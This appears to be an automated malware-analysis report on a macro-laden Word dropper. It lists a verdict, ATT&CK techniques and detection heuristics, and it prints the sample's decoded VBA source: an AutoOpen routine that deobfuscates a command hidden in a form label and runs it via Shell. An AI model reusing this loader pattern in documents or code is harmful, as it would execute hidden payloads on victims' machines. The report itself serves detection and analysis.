Verdict: MALICIOUS
Risk score: 262

Malware insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample contains VBA macros with an autoopen routine that calls the Shell() function, indicating it's designed to execute a payload. The document body explicitly instructs the user to 'Enable Content' to view secure information, a common lure for macro-based malware. The ClamAV detection name 'Doc.Dropper.Agent-6520162-0' further supports its nature as a dropper.
Heuristics (8)

- ClamAV: Doc.Dropper.Agent-6520162-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6520162-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure [medium, SE_ENABLE_LURE]: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following URLs were found in document text (OLE body):
  - http://schemas.openxmlformats.org/drawingml/2006/main
  - http://schemas.microsoft.com/sharepoint/v3/contenttype/forms
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml
  - http://schemas.microsoft.com/office/2006/metadata/contentType
  - http://schemas.microsoft.com/office/2006/metadata/properties/
  - http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes
  - http://schemas.microsoft.com/office/2006/metadata/properties
  - http://www.w3.org/2001/XMLSchema
  - http://schemas.microsoft.com/office/2006/documentManagement/types
  - http://schemas.microsoft.com/office/infopath/2007/PartnerControls
  - http://schemas.openxmlformats.org/package/2006/metadata/core-properties
  - http://www.w3.org/2001/XMLSchema-instance
  - http://purl.org/dc/elements/1.1/
  - http://purl.org/dc/terms/
  - http://schemas.microsoft.com/internal/obd
  - http://dublincore.org/schemas/xmls/qdc/2003/04/02/dc.xsd
  - http://dublincore.org/schemas/xmls/qdc/2003/04/02/dcterms.xsd
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1928 bytes |

SHA-256: 5195b8256d915c0186bccec874fac493fa418a61e142ce317d33b8b8da4f9a22

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Rem bap bap bap
bessameat
End Sub
Attribute VB_Name = "Module1"
Sub bessameat()
Dim str2 As String
Dim id As Integer
Dim ota As Integer
With UserForm1.Label1
ota = .Left
End With
Dim j As Integer
str2 = vantalin(ota)
For j = 0 To 1
supernosa (str2)
id = id + 1
Next
End Sub
Sub supernosa(jon)
Dim td As Integer
td = 254
jsdf = Len(jon)
td = jsdf - td
If jsdf = 254 Then
Shell jon, td
End If
End Sub
Function vantalin(cde)
Dim QlyC As String
Dim Eftdxb() As Byte
Dim Vfxbovft() As Byte
Dim askg As String
askg = "M1Z8CKV"
Dim LanjyA As String
LanjyA = UserForm1.Label2.Caption
Dim Nyji As String
Dim Jvpbobb() As Byte
QlyC = "IhgypyadO"
Vfxbovft = LanjyA
Eftdxb = askg
Ru = UBound(Vfxbovft)
Nyji = "Moaygys"
Dim Lkej5 As String
Yrb = UBound(Eftdxb)
Lkej5 = ""
cde = cde - 11
For iifyjn = 0 To Ru
nvf8 = 0
For ob = 0 To Yrb
If Vfxbovft(iifyjn) = Eftdxb(ob) Then nvf8 = nvf8 + 1
Next
If nvf8 = 0 Then
city = Vfxbovft(iifyjn) - cde
Lkej5 = Lkej5 + Chr$(city)
End If
Next
Dim Rogy As String
vantalin = Lkej5
Rogy = "Create document"
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D99F50C2-1CC4-4C88-9387-FEFC4D9A26C5}{952455F0-1062-4F4B-8C62-FD5D484C4145}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Label1.Caption = "Start"
End Sub
Private Sub Label3_Click()
End Sub
```